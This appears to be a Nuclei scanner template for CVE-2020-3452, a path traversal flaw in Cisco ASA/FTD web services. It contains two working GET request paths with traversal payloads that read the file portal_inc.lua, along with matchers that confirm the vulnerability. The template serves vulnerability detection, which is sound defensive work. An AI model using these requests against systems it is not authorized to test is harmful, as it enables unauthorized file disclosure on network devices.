21 lines
627 B
YAML
21 lines
627 B
YAML
id: CVE-2020-3452
|
|
|
|
info:
|
|
name: CVE-2020-3452
|
|
author: pdteam
|
|
severity: medium
|
|
reference: https://twitter.com/aboul3la/status/1286012324722155525
|
|
tags: cve,cve2020,cisco,traversal
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
|
|
- "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "INTERNAL_PASSWORD_ENABLED"
|
|
- "CONF_VIRTUAL_KEYBOARD"
|
|
condition: and
|